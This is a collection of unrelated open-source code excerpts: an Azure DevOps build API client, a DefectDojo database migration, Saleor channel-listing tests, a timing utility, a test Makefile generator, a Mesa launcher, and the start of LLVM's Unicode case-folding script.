            query[wire_name] = self._serialize.query(py_name, value, kind)

    _put('name', 'name', name, 'str')
    _put('repositoryId', 'repository_id', repository_id, 'str')
    _put('repositoryType', 'repository_type', repository_type, 'str')
    _put('queryOrder', 'query_order', query_order, 'str')
    _put('$top', 'top', top, 'int')
    _put('continuationToken', 'continuation_token', continuation_token, 'str')
    _put('minMetricsTime', 'min_metrics_time', min_metrics_time, 'iso-8601')
    _put('definitionIds', 'definition_ids', None if definition_ids is None else ",".join(str(d) for d in definition_ids), 'str')
    _put('path', 'path', path, 'str')
    _put('builtAfter', 'built_after', built_after, 'iso-8601')
    _put('notBuiltAfter', 'not_built_after', not_built_after, 'iso-8601')
    _put('includeAllProperties', 'include_all_properties', include_all_properties, 'bool')
    _put('includeLatestBuilds', 'include_latest_builds', include_latest_builds, 'bool')
    _put('taskIdFilter', 'task_id_filter', task_id_filter, 'str')
    _put('processType', 'process_type', process_type, 'int')
    _put('yamlFilename', 'yaml_filename', yaml_filename, 'str')
    response = self._send(
        http_method='GET',
        location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
        version='5.1',
        route_values=route,
        query_parameters=query)
    definitions = self._deserialize('[BuildDefinitionReference]', self._unwrap_collection(response))
    token = self._get_continuation_token(response)
    return self.GetDefinitionsResponseValue(definitions, token)
class GetDefinitionsResponseValue(object):
    """Paged result wrapper returned by the get_definitions method."""

    def __init__(self, value, continuation_token):
        """
        :param value: The current page of definition references.
        :type value: :class:`<[BuildDefinitionReference]> <azure.devops.v5_1.build.models.[BuildDefinitionReference]>`
        :param continuation_token: Token to be used to get the next page of results.
        :type continuation_token: str
        """
        self.value = value
        self.continuation_token = continuation_token
def restore_definition(self, project, definition_id, deleted):
    """RestoreDefinition.
    Restores a previously deleted definition.
    :param str project: Project ID or project name
    :param int definition_id: The identifier of the definition to restore.
    :param bool deleted: When false, restores a deleted definition.
    :rtype: :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if definition_id is not None:
        route['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
    query = {}
    if deleted is not None:
        query['deleted'] = self._serialize.query('deleted', deleted, 'bool')
    response = self._send(
        http_method='PATCH',
        location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
        version='5.1',
        route_values=route,
        query_parameters=query)
    return self._deserialize('BuildDefinition', response)
def update_definition(self, definition, project, definition_id, secrets_source_definition_id=None, secrets_source_definition_revision=None):
    """UpdateDefinition.
    Replaces an existing definition with a new version.
    :param :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>` definition: The new version of the definition.
    :param str project: Project ID or project name
    :param int definition_id: The ID of the definition.
    :param int secrets_source_definition_id:
    :param int secrets_source_definition_revision:
    :rtype: :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if definition_id is not None:
        route['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
    query = {}
    if secrets_source_definition_id is not None:
        query['secretsSourceDefinitionId'] = self._serialize.query('secrets_source_definition_id', secrets_source_definition_id, 'int')
    if secrets_source_definition_revision is not None:
        query['secretsSourceDefinitionRevision'] = self._serialize.query('secrets_source_definition_revision', secrets_source_definition_revision, 'int')
    payload = self._serialize.body(definition, 'BuildDefinition')
    response = self._send(
        http_method='PUT',
        location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
        version='5.1',
        route_values=route,
        query_parameters=query,
        content=payload)
    return self._deserialize('BuildDefinition', response)
def get_build_log(self, project, build_id, log_id, start_line=None, end_line=None, **kwargs):
    """GetBuildLog.
    Streams an individual log file of a build as plain text.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :param int log_id: The ID of the log file.
    :param long start_line: The start line.
    :param long end_line: The end line.
    :rtype: object
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if build_id is not None:
        route['buildId'] = self._serialize.url('build_id', build_id, 'int')
    if log_id is not None:
        route['logId'] = self._serialize.url('log_id', log_id, 'int')
    query = {}
    if start_line is not None:
        query['startLine'] = self._serialize.query('start_line', start_line, 'long')
    if end_line is not None:
        query['endLine'] = self._serialize.query('end_line', end_line, 'long')
    response = self._send(
        http_method='GET',
        location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
        version='5.1',
        route_values=route,
        query_parameters=query,
        accept_media_type='text/plain')
    # Optional download-progress hook supplied by the caller.
    callback = kwargs.get("callback")
    return self._client.stream_download(response, callback=callback)
def get_build_log_lines(self, project, build_id, log_id, start_line=None, end_line=None):
    """GetBuildLogLines.
    Returns the lines of an individual build log file.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :param int log_id: The ID of the log file.
    :param long start_line: The start line.
    :param long end_line: The end line.
    :rtype: [str]
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if build_id is not None:
        route['buildId'] = self._serialize.url('build_id', build_id, 'int')
    if log_id is not None:
        route['logId'] = self._serialize.url('log_id', log_id, 'int')
    query = {}
    if start_line is not None:
        query['startLine'] = self._serialize.query('start_line', start_line, 'long')
    if end_line is not None:
        query['endLine'] = self._serialize.query('end_line', end_line, 'long')
    response = self._send(
        http_method='GET',
        location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
        version='5.1',
        route_values=route,
        query_parameters=query)
    return self._deserialize('[str]', self._unwrap_collection(response))
def get_build_logs(self, project, build_id):
    """GetBuildLogs.
    Lists the log files produced by a build.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :rtype: [BuildLog]
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if build_id is not None:
        route['buildId'] = self._serialize.url('build_id', build_id, 'int')
    response = self._send(
        http_method='GET',
        location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
        version='5.1',
        route_values=route)
    return self._deserialize('[BuildLog]', self._unwrap_collection(response))
def get_build_logs_zip(self, project, build_id, **kwargs):
    """GetBuildLogsZip.
    Streams all logs of a build as a single zip archive.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :rtype: object
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if build_id is not None:
        route['buildId'] = self._serialize.url('build_id', build_id, 'int')
    response = self._send(
        http_method='GET',
        location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
        version='5.1',
        route_values=route,
        accept_media_type='application/zip')
    # Optional download-progress hook supplied by the caller.
    callback = kwargs.get("callback")
    return self._client.stream_download(response, callback=callback)
def get_build_log_zip(self, project, build_id, log_id, start_line=None, end_line=None, **kwargs):
    """GetBuildLogZip.
    Streams an individual build log file as a zip archive.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :param int log_id: The ID of the log file.
    :param long start_line: The start line.
    :param long end_line: The end line.
    :rtype: object
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if build_id is not None:
        route['buildId'] = self._serialize.url('build_id', build_id, 'int')
    if log_id is not None:
        route['logId'] = self._serialize.url('log_id', log_id, 'int')
    query = {}
    if start_line is not None:
        query['startLine'] = self._serialize.query('start_line', start_line, 'long')
    if end_line is not None:
        query['endLine'] = self._serialize.query('end_line', end_line, 'long')
    response = self._send(
        http_method='GET',
        location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
        version='5.1',
        route_values=route,
        query_parameters=query,
        accept_media_type='application/zip')
    # Optional download-progress hook supplied by the caller.
    callback = kwargs.get("callback")
    return self._client.stream_download(response, callback=callback)
def get_build_option_definitions(self, project=None):
    """GetBuildOptionDefinitions.
    Lists every build definition option the system supports.
    :param str project: Project ID or project name
    :rtype: [BuildOptionDefinition]
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    response = self._send(
        http_method='GET',
        location_id='591cb5a4-2d46-4f3a-a697-5cd42b6bd332',
        version='5.1',
        route_values=route)
    return self._deserialize('[BuildOptionDefinition]', self._unwrap_collection(response))
def get_definition_revisions(self, project, definition_id):
    """GetDefinitionRevisions.
    Lists every revision of a build definition.
    :param str project: Project ID or project name
    :param int definition_id: The ID of the definition.
    :rtype: [BuildDefinitionRevision]
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if definition_id is not None:
        route['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
    response = self._send(
        http_method='GET',
        location_id='7c116775-52e5-453e-8c5d-914d9762d8c4',
        version='5.1',
        route_values=route)
    return self._deserialize('[BuildDefinitionRevision]', self._unwrap_collection(response))
def get_build_settings(self, project=None):
    """GetBuildSettings.
    Reads the current build settings.
    :param str project: Project ID or project name
    :rtype: :class:`<BuildSettings> <azure.devops.v5_1.build.models.BuildSettings>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    response = self._send(
        http_method='GET',
        location_id='aa8c1c9c-ef8b-474a-b8c4-785c7b191d0d',
        version='5.1',
        route_values=route)
    return self._deserialize('BuildSettings', response)
def update_build_settings(self, settings, project=None):
    """UpdateBuildSettings.
    Writes new build settings.
    :param :class:`<BuildSettings> <azure.devops.v5_1.build.models.BuildSettings>` settings: The new settings.
    :param str project: Project ID or project name
    :rtype: :class:`<BuildSettings> <azure.devops.v5_1.build.models.BuildSettings>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    payload = self._serialize.body(settings, 'BuildSettings')
    response = self._send(
        http_method='PATCH',
        location_id='aa8c1c9c-ef8b-474a-b8c4-785c7b191d0d',
        version='5.1',
        route_values=route,
        content=payload)
    return self._deserialize('BuildSettings', response)
def add_build_tag(self, project, build_id, tag):
    """AddBuildTag.
    Adds a tag to a build.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :param str tag: The tag to add.
    :rtype: [str]
    """
    # The tag itself is part of the route, not the body, for this PUT.
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('buildId', 'build_id', build_id, 'int'),
            ('tag', 'tag', tag, 'str'),
        ]
        if value is not None
    }
    response = self._send(http_method='PUT',
                          location_id='6e6114b2-8161-44c8-8f6c-c5505782427f',
                          version='5.1',
                          route_values=route_values)
    return self._deserialize('[str]', self._unwrap_collection(response))
def add_build_tags(self, tags, project, build_id):
    """AddBuildTags.
    Adds tags to a build.
    :param [str] tags: The tags to add.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :rtype: [str]
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('buildId', 'build_id', build_id, 'int'),
        ]
        if value is not None
    }
    # Multiple tags are posted as a JSON array in the body.
    content = self._serialize.body(tags, '[str]')
    response = self._send(http_method='POST',
                          location_id='6e6114b2-8161-44c8-8f6c-c5505782427f',
                          version='5.1',
                          route_values=route_values,
                          content=content)
    return self._deserialize('[str]', self._unwrap_collection(response))
def delete_build_tag(self, project, build_id, tag):
    """DeleteBuildTag.
    Removes a tag from a build.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :param str tag: The tag to remove.
    :rtype: [str]
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('buildId', 'build_id', build_id, 'int'),
            ('tag', 'tag', tag, 'str'),
        ]
        if value is not None
    }
    # Returns the remaining set of tags on the build.
    response = self._send(http_method='DELETE',
                          location_id='6e6114b2-8161-44c8-8f6c-c5505782427f',
                          version='5.1',
                          route_values=route_values)
    return self._deserialize('[str]', self._unwrap_collection(response))
def get_build_tags(self, project, build_id):
    """GetBuildTags.
    Gets the tags for a build.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :rtype: [str]
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('buildId', 'build_id', build_id, 'int'),
        ]
        if value is not None
    }
    response = self._send(http_method='GET',
                          location_id='6e6114b2-8161-44c8-8f6c-c5505782427f',
                          version='5.1',
                          route_values=route_values)
    return self._deserialize('[str]', self._unwrap_collection(response))
def get_tags(self, project):
    """GetTags.
    Gets a list of all build and definition tags in the project.
    :param str project: Project ID or project name
    :rtype: [str]
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
        ]
        if value is not None
    }
    response = self._send(http_method='GET',
                          location_id='d84ac5c6-edc7-43d5-adc9-1b34be5dea09',
                          version='5.1',
                          route_values=route_values)
    return self._deserialize('[str]', self._unwrap_collection(response))
def delete_template(self, project, template_id):
    """DeleteTemplate.
    Deletes a build definition template.
    :param str project: Project ID or project name
    :param str template_id: The ID of the template.
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('templateId', 'template_id', template_id, 'str'),
        ]
        if value is not None
    }
    # DELETE returns no payload; nothing to deserialize.
    self._send(http_method='DELETE',
               location_id='e884571e-7f92-4d6a-9274-3f5649900835',
               version='5.1',
               route_values=route_values)
def get_template(self, project, template_id):
    """GetTemplate.
    Gets a specific build definition template.
    :param str project: Project ID or project name
    :param str template_id: The ID of the requested template.
    :rtype: :class:`<BuildDefinitionTemplate> <azure.devops.v5_1.build.models.BuildDefinitionTemplate>`
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('templateId', 'template_id', template_id, 'str'),
        ]
        if value is not None
    }
    response = self._send(http_method='GET',
                          location_id='e884571e-7f92-4d6a-9274-3f5649900835',
                          version='5.1',
                          route_values=route_values)
    return self._deserialize('BuildDefinitionTemplate', response)
def get_templates(self, project):
    """GetTemplates.
    Gets all definition templates.
    :param str project: Project ID or project name
    :rtype: [BuildDefinitionTemplate]
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
        ]
        if value is not None
    }
    response = self._send(http_method='GET',
                          location_id='e884571e-7f92-4d6a-9274-3f5649900835',
                          version='5.1',
                          route_values=route_values)
    return self._deserialize('[BuildDefinitionTemplate]', self._unwrap_collection(response))
def save_template(self, template, project, template_id):
    """SaveTemplate.
    Updates an existing build definition template.
    :param :class:`<BuildDefinitionTemplate> <azure.devops.v5_1.build.models.BuildDefinitionTemplate>` template: The new version of the template.
    :param str project: Project ID or project name
    :param str template_id: The ID of the template.
    :rtype: :class:`<BuildDefinitionTemplate> <azure.devops.v5_1.build.models.BuildDefinitionTemplate>`
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('templateId', 'template_id', template_id, 'str'),
        ]
        if value is not None
    }
    # PUT replaces the stored template with the serialized body.
    content = self._serialize.body(template, 'BuildDefinitionTemplate')
    response = self._send(http_method='PUT',
                          location_id='e884571e-7f92-4d6a-9274-3f5649900835',
                          version='5.1',
                          route_values=route_values,
                          content=content)
    return self._deserialize('BuildDefinitionTemplate', response)
def get_build_timeline(self, project, build_id, timeline_id=None, change_id=None, plan_id=None):
    """GetBuildTimeline.
    Gets details for a build
    :param str project: Project ID or project name
    :param int build_id:
    :param str timeline_id:
    :param int change_id:
    :param str plan_id:
    :rtype: :class:`<Timeline> <azure.devops.v5_1.build.models.Timeline>`
    """
    # Route segments, skipping any argument that was not provided.
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('buildId', 'build_id', build_id, 'int'),
            ('timelineId', 'timeline_id', timeline_id, 'str'),
        ]
        if value is not None
    }
    # Optional query-string parameters.
    query_parameters = {
        key: self._serialize.query(name, value, kind)
        for key, name, value, kind in [
            ('changeId', 'change_id', change_id, 'int'),
            ('planId', 'plan_id', plan_id, 'str'),
        ]
        if value is not None
    }
    response = self._send(http_method='GET',
                          location_id='8baac422-4c6e-4de5-8532-db96d92acffa',
                          version='5.1',
                          route_values=route_values,
                          query_parameters=query_parameters)
    return self._deserialize('Timeline', response)
def get_build_work_items_refs(self, project, build_id, top=None):
    """GetBuildWorkItemsRefs.
    Gets the work items associated with a build.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :param int top: The maximum number of work items to return.
    :rtype: [ResourceRef]
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('buildId', 'build_id', build_id, 'int'),
        ]
        if value is not None
    }
    # '$top' limits the number of results returned by the service.
    query_parameters = {}
    if top is not None:
        query_parameters['$top'] = self._serialize.query('top', top, 'int')
    response = self._send(http_method='GET',
                          location_id='5a21f5d2-5642-47e4-a0bd-1356e6731bee',
                          version='5.1',
                          route_values=route_values,
                          query_parameters=query_parameters)
    return self._deserialize('[ResourceRef]', self._unwrap_collection(response))
def get_build_work_items_refs_from_commits(self, commit_ids, project, build_id, top=None):
    """GetBuildWorkItemsRefsFromCommits.
    Gets the work items associated with a build, filtered to specific commits.
    :param [str] commit_ids: A comma-delimited list of commit IDs.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :param int top: The maximum number of work items to return, or the number of commits to consider if no commit IDs are specified.
    :rtype: [ResourceRef]
    """
    route_values = {
        segment: self._serialize.url(name, value, kind)
        for segment, name, value, kind in [
            ('project', 'project', project, 'str'),
            ('buildId', 'build_id', build_id, 'int'),
        ]
        if value is not None
    }
    query_parameters = {}
    if top is not None:
        query_parameters['$top'] = self._serialize.query('top', top, 'int')
    # The commit filter travels in the POST body as a JSON string array.
    content = self._serialize.body(commit_ids, '[str]')
    response = self._send(http_method='POST',
                          location_id='5a21f5d2-5642-47e4-a0bd-1356e6731bee',
                          version='5.1',
                          route_values=route_values,
                          query_parameters=query_parameters,
                          content=content)
    return self._deserialize('[ResourceRef]', self._unwrap_collection(response))
|
dojo/db_migrations/0147_rename_sslyze_parser.py | dant24/django-DefectDojo | 249 | 9949 | <filename>dojo/db_migrations/0147_rename_sslyze_parser.py
from django.db import migrations
def rename_sslyze_parser(apps, schema_editor):
    """Rename the 'SSLyze 3 Scan (JSON)' test type to 'SSLyze Scan (JSON)'."""
    test_type = apps.get_model('dojo', 'Test_Type')
    try:
        sslyze = test_type.objects.get(name='SSLyze 3 Scan (JSON)')
    except test_type.DoesNotExist:
        # Fresh DefectDojo installs never created the old name; nothing to do.
        return
    sslyze.name = 'SSLyze Scan (JSON)'
    sslyze.save()
class Migration(migrations.Migration):

    # Must run after the 0146_lead_optional migration.
    dependencies = [
        ('dojo', '0146_lead_optional'),
    ]

    # Data-only migration; no reverse operation is provided.
    operations = [
        migrations.RunPython(rename_sslyze_parser),
    ]
|
saleor/graphql/channel/tests/test_base_channel_listing.py | fairhopeweb/saleor | 15,337 | 10042 | from collections import defaultdict
import graphene
import pytest
from django.core.exceptions import ValidationError
from ....shipping.error_codes import ShippingErrorCode
from ..mutations import BaseChannelListingMutation
def test_validate_duplicated_channel_ids(channel_PLN, channel_USD):
    # given: two distinct channels split between the two ID lists
    usd_id = graphene.Node.to_global_id("Channel", channel_USD.id)
    pln_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
    errors = defaultdict(list)

    # when
    result = BaseChannelListingMutation.validate_duplicated_channel_ids(
        [usd_id],
        [pln_id],
        errors,
        ShippingErrorCode.DUPLICATED_INPUT_ITEM.value,
    )

    # then: distinct IDs produce no validation errors
    assert result is None
    assert errors["input"] == []
def test_validate_duplicated_channel_ids_with_duplicates(channel_PLN):
    # given: the same channel appears in both ID lists
    duplicate_a = graphene.Node.to_global_id("Channel", channel_PLN.id)
    duplicate_b = graphene.Node.to_global_id("Channel", channel_PLN.id)
    error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
    errors = defaultdict(list)

    # when
    result = BaseChannelListingMutation.validate_duplicated_channel_ids(
        [duplicate_a], [duplicate_b], errors, error_code
    )

    # then: the overlap is reported under the "input" key
    assert result is None
    assert errors["input"][0].code == error_code
def test_validate_duplicated_channel_values(channel_PLN, channel_USD):
    # given: two different channels supplied for one input field
    pln_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
    usd_id = graphene.Node.to_global_id("Channel", channel_USD.id)
    error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
    errors = defaultdict(list)
    field = "add_channels"

    # when
    result = BaseChannelListingMutation.validate_duplicated_channel_values(
        [pln_id, usd_id], field, errors, error_code
    )

    # then: no duplicates, so no errors for the field
    assert result is None
    assert errors[field] == []
def test_validate_duplicated_channel_values_with_duplicates(channel_PLN):
    # given: the same channel listed twice in one input field
    duplicate_a = graphene.Node.to_global_id("Channel", channel_PLN.id)
    duplicate_b = graphene.Node.to_global_id("Channel", channel_PLN.id)
    error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
    errors = defaultdict(list)
    field = "add_channels"

    # when
    result = BaseChannelListingMutation.validate_duplicated_channel_values(
        [duplicate_a, duplicate_b], field, errors, error_code
    )

    # then: the duplicate is reported against the field itself
    assert result is None
    assert errors[field][0].code == error_code
def test_clean_channels_add_channels(channel_PLN):
    # given
    pln_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
    error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
    errors = defaultdict(list)

    # when
    result = BaseChannelListingMutation.clean_channels(
        None, {"add_channels": [{"channel_id": pln_id}]}, errors, error_code
    )

    # then: the channel model instance is resolved and attached to the input
    assert result == {
        "add_channels": [{"channel_id": pln_id, "channel": channel_PLN}],
        "remove_channels": [],
    }
    assert errors["input"] == []
def test_clean_channels_remove_channels(channel_PLN):
    # given
    pln_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
    error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
    errors = defaultdict(list)

    # when
    result = BaseChannelListingMutation.clean_channels(
        None, {"remove_channels": [pln_id]}, errors, error_code
    )

    # then: removals are resolved to database PKs (as strings)
    assert result == {"add_channels": [], "remove_channels": [str(channel_PLN.id)]}
    assert errors["input"] == []
# NOTE(review): the doubled "test_test_" prefix looks like a typo; kept so
# the collected test name does not change.
def test_test_clean_channels_with_errors(channel_PLN):
    # given: the same channel listed twice for removal
    pln_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
    error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
    errors = defaultdict(list)

    # when
    result = BaseChannelListingMutation.clean_channels(
        None, {"remove_channels": [pln_id, pln_id]}, errors, error_code
    )

    # then: duplicates abort cleaning and are reported per field
    assert result == {}
    assert errors["remove_channels"][0].code == error_code
# NOTE(review): the doubled "test_test_" prefix looks like a typo; kept so
# the collected test name does not change.
def test_test_clean_channels_invalid_object_type(channel_PLN):
    # given: a global ID whose type is not "Channel"
    product_id = graphene.Node.to_global_id("Product", channel_PLN.id)
    error_code = ShippingErrorCode.GRAPHQL_ERROR.value
    errors = defaultdict(list)

    # when
    with pytest.raises(ValidationError) as error:
        BaseChannelListingMutation.clean_channels(
            None, {"remove_channels": [product_id]}, errors, error_code
        )

    # then
    assert (
        error.value.error_dict["remove_channels"][0].message
        == f"Must receive Channel id: {product_id}."
    )
|
QUICK_START/NODE_SQUEEZESEG_CLUSTER/src/script/squeezeseg/utils/clock.py | Hqss/DINK | 189 | 10051 | <reponame>Hqss/DINK
#! /usr/bin/python2
# -*- coding: utf-8 -*-
"""
Clock function to take running time following Segmatch.
"""
# BSD 3-Clause License
#
# Copyright (c) 2019, FPAI
# Copyright (c) 2019, SeriouslyHAO
# Copyright (c) 2019, xcj2019
# Copyright (c) 2019, Leonfirst
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
class Clock(object):
    """Wall-clock stopwatch reporting elapsed milliseconds.

    Mirrors the timing helper used by Segmatch.
    """

    def __init__(self):
        # Conversion factors kept for backward compatibility with callers
        # that may read them.
        self.kSecondsToMiliseconds = 1000.0
        self.kMicrosecondsToMiliseconds = 0.001
        self.start()

    def start(self):
        """(Re)start the stopwatch."""
        self.real_time_start_ = datetime.datetime.now()

    def takeTime(self):
        """Sample elapsed time since start() into ``self.real_time_ms_``.

        Fixes two defects in the original:
        - ``datetime.now()`` was called twice (once for ``.seconds`` and
          once for ``.microseconds``), so the two fields could come from
          different instants;
        - ``.seconds`` silently dropped whole days for long runs;
          ``total_seconds()`` accounts for them.
        """
        elapsed = datetime.datetime.now() - self.real_time_start_
        # The "+ 0.5" rounding bias is preserved from the original code.
        self.real_time_ms_ = elapsed.total_seconds() * self.kSecondsToMiliseconds + 0.5

    def getRealTime(self):
        """Return the most recently sampled elapsed time, in milliseconds."""
        return self.real_time_ms_

    def takeRealTime(self):
        """Sample and return the elapsed time in milliseconds."""
        self.takeTime()
        return self.getRealTime()
|
tests/periodicities/gen_makefile.py | jmabry/pyaf | 377 | 10077 | <reponame>jmabry/pyaf<filename>tests/periodicities/gen_makefile.py
import os
import glob

# NOTE(review): this glob result is immediately overwritten by the
# hard-coded list below — presumably kept for switching back; confirm
# before removing.
subdirs = glob.glob("tests/periodicities/*");

subdirs = ['tests/periodicities/Month',
           'tests/periodicities/Minute',
           'tests/periodicities/Week',
           'tests/periodicities/Business_Hour',
           'tests/periodicities/Business_Day',
           'tests/periodicities/Second',
           'tests/periodicities/Semi_Month',
           'tests/periodicities/Hour',
           'tests/periodicities/Day']

#print(subdirs)

# Makefile header: interpreter used by every generated rule.
print("PYTHON=python3\n\n");

lAllTarget = "";

for subdir1 in sorted(subdirs):
    lBase = os.path.basename(subdir1);
    test_target = "";
    for filename in sorted(glob.glob(subdir1 + "/*.py")):
        bn = os.path.basename(filename);
        logfile = bn.replace("/" , "_");
        logfile = "logs/periodicities_" + logfile.replace(".py" , ".log");
        # One rule per test script; the "-" prefix lets make continue on failure.
        print("#PROCESSING FILE : " , filename, bn , logfile);
        print(bn , " : " , "\n\t", "-$(PYTHON) " , filename , " > " , logfile , " 2>&1");
        test_target = bn + " " + test_target;
    lAllTarget = lAllTarget + " " + lBase;
    # Aggregate rule running every test script in this periodicity directory.
    print("\n\n", lBase , ": ", test_target, "\n" , "\n");

print("\n# ********************************************** \n");
print("all: " , lAllTarget , "\n\t\n");
|
examples/forest_fire/run.py | fire-suppression-abm/mesa | 1,704 | 10095 | <filename>examples/forest_fire/run.py
# Entry point: start the Mesa visualization server for the forest fire model.
from forest_fire.server import server

server.launch()
|
llvm-7.0.0.src/utils/unicode-case-fold.py | sillywalk/grazz | 171 | 10099 | <filename>llvm-7.0.0.src/utils/unicode-case-fold.py<gh_stars>100-1000
#!/usr/bin/env python
"""
Unicode case folding database conversion utility
Parses the database and generates a C++ function which implements the case
folding algorithm. The database entries are of the form:
<code>; <status>; <mapping>; # <name>
<status> can be one of four characters:
C - Common mappings
S - mappings for Simple case folding
F - mappings for Full case folding
T - special case for Turkish I characters
Right now this generates a function which implements simple case folding (C+S
entries).
"""
import sys
import re
import urllib2
# This variable will body of the mappings function
body = ""
# Reads file line-by-line, extracts Common and Simple case fold mappings and
# returns a (from_char, to_char, from_name) tuple.
def mappings(f):
    """Yield (from_char, to_char, from_name) for every C/S fold entry in f.

    Raises if the entries are not strictly increasing by from_char.
    """
    line_re = re.compile(r'^(.*); [CS]; (.*); # (.*)')
    last_from = -1
    for line in f:
        match = line_re.match(line)
        if match:
            src = int(match.group(1), 16)
            dst = int(match.group(2), 16)
            name = match.group(3)
            if src <= last_from:
                raise Exception("Duplicate or unsorted characters in input")
            yield src, dst, name
            last_from = src
# Computes the shift (to_char - from_char) in a mapping.
def shift(mapping):
    from_char, to_char = mapping[0], mapping[1]
    return to_char - from_char
# Computes the stride (from_char2 - from_char1) of two mappings.
def stride2(mapping1, mapping2):
    first, second = mapping1[0], mapping2[0]
    return second - first
# Computes the stride of a list of mappings. The list should have at least two
# mappings. All mappings in the list are assumed to have the same stride.
def stride(block):
    # Distance between the first two from_chars (stride2 of the first pair).
    return block[1][0] - block[0][0]
# b is a list of mappings. All the mappings are assumed to have the same
# shift and the stride between adjecant mappings (if any) is constant.
def dump_block(b):
    # Appends C++ source implementing this block's mappings to the module
    # global `body`.
    global body

    if len(b) == 1:
